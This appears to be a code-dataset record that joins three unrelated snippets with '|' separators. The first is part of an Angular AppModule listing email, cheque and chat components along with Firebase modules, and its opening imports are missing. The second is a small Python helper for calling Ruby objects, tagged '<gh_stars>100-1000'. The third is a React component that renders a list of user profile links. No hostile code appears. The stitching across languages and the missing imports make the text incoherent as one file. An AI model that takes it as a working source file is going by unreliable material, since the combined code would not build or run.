import {TacheComponent} from './components/tache/tache.component';
import {SentComponent} from './components/email/sent/sent.component';
import { MessageComponent} from './components/email/message/message.component';
import {DraftComponent} from './components/email/draft/draft.component';
import {DeletedComponent} from './components/email/deleted/deleted.component';
import {TrashComponent} from './components/email/trash/trash.component';
import {TrashModifiedComponent} from './components/email/tashModified/trashModified.component';
import {DeletedModifiedComponent} from './components/email/deletedModified/deletedModified.component';
import {ProfileComponent} from './components/profile/profile.component';
import { SpinnerComponent } from './components/filter/spinner.component';
import {ChatComponent} from './components/chat/chat.component';
@NgModule({
declarations: [
SpinnerComponent,
AppComponent,
LoginComponent,
DashboardComponent,
NavbarComponent,
OperationComponent,
ChequeComponent,
ChangeComponent,
EmailComponent,
InboxComponent,
SentComponent,
MessageComponent,
DraftComponent,
DeletedComponent,
TrashComponent,
TrashModifiedComponent,
DeletedModifiedComponent,
TacheComponent,
ProfileComponent,
ChatComponent,
DataFilterPipe
],
imports: [
BrowserModule,
routing,
HttpModule,
FormsModule,
HttpClientModule,
DataTableModule,
BrowserAnimationsModule,
ToastModule.forRoot(),
ModalModule.forRoot(),
BootstrapModalModule,
Ng4LoadingSpinnerModule.forRoot(),
AngularFireModule.initializeApp(environment.config),
AngularFireDatabaseModule,
AmChartsModule,
CKEditorModule,
GooglePlaceModule,
AngularFirestoreModule
],
providers: [
appRoutingProviders,
JwtHelper,
NgIf,
NgForOf,
AuthenticateService,
OperationService,
DashboardService,
CompteService,
ChequeService,
ChangeService,
EmailService,
ProfileService,
TaskService
],
bootstrap: [AppComponent]
})
export class AppModule { }
|
<gh_stars>100-1000
def call_callable(f, x=None):
if x is None:
return f()
return f(str(x))
def test_ruby_object_attr(ro):
return ro.attr()
def test_ruby_object_method(ro):
return ro.smethod(42)
|
import React, { Component } from 'react';
class UserList extends Component {
constructor(props) {
super(props);
this.state = {
userList: props.userList
};
}
render() {
return (
<ul>
{this.state.userList.map((user, index) => (
<li key={index}>
{user.name}: <a href={user.profileURL}>Profile</a>
</li>
))}
</ul>
);
}
}
export default UserList; |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.